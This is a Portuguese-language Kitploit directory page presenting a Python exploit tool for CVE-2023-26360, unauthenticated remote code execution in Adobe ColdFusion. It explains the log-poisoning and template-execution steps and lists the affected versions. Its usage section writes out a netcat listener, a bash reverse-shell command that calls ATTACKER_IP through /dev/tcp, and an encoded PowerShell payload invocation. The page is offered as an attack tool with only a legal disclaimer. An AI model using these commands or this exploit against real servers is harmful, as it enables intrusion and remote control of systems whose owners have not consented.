Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

This exploit is based on CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) and was built on top of the Metasploit module and the jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 2 mesesAinda não revisado

CVE-2023-26360 — Adobe ColdFusion RCE Não Autenticado

Implementação em Python do exploit de execução remota de código para o CVE-2023-26360, baseada na análise do módulo Metasploit original e no trabalho anterior de jakabakos.

Por que isso existe

O PoC do jakabakos tenta injetar <cfexecute> diretamente no parâmetro _variables e ler a saída do log do ColdFusion em uma única etapa. Essa abordagem falha porque o ColdFusion não avalia tags CFML inline nesse contexto, resultando em um erro 500 sem execução de código.

Esta implementação replica o mecanismo correto de duas etapas usado pelo módulo Metasploit:

  1. Envenenamento de log — envia um payload _variables malformado ({<cftry>CFML</cftry>) para o endpoint CFC vulnerável. O ColdFusion falha ao analisá-lo e escreve o conteúdo bruto — incluindo o código CFML — em coldfusion-out.log.
  2. Execução de template — usa a vulnerabilidade de desserialização de classname para carregar o arquivo de log envenenado como um template do ColdFusion, fazendo com que o servidor execute o CFML injetado.

A execução de comandos é realizada via java.lang.Runtime.exec() através de createObject, evitando qualquer dependência de <cfexecute>, que normalmente é desabilitado em ambientes reforçados ou de produção.

Versões afetadas

  • Adobe ColdFusion 2021 Update 5 e anteriores
  • Adobe ColdFusion 2018 Update 15 e anteriores

Requisitos

root@kitploit:~
pip install -r requirements.txt

Uso

Inicie um listener antes de executar o exploit:

root@kitploit:~
nc -lvnp 4444

Alvo Windows:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"

Alvo Linux:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Através de um proxy (ex.: Burp Suite):

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080

Opções

FlagDescrição
--host

Como funciona

root@kitploit:~
┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
│   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
│             │      CF fails to parse, logs CFML     │                  │
│             │                                       │ coldfusion-      │
│             │         Step 2: trigger execution     │ out.log          │
│             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
│             │                                       │  CFML template)  │
│  Listener   │ ◄─────────────── reverse shell ───────│                  │
└─────────────┘                                       └──────────────────┘

Referências

  • Comunicado de Segurança da Adobe
  • Análise da Rapid7 — AttackerKB
  • Módulo Metasploit
  • PoC do jakabakos

Aviso legal

Esta ferramenta é fornecida apenas para fins educacionais e avaliações de segurança autorizadas (testes de penetração, CTFs, ambientes de laboratório). Executar este exploit contra sistemas sem permissão explícita por escrito é ilegal. O autor não assume nenhuma responsabilidade por qualquer uso indevido.

Baixar ferramenta
URL base do alvo (ex.: http://192.168.1.10:8500)
--cmdComando a executar no alvo
--winDefina esta flag se o alvo for um host Windows
--proxyURL opcional do proxy HTTP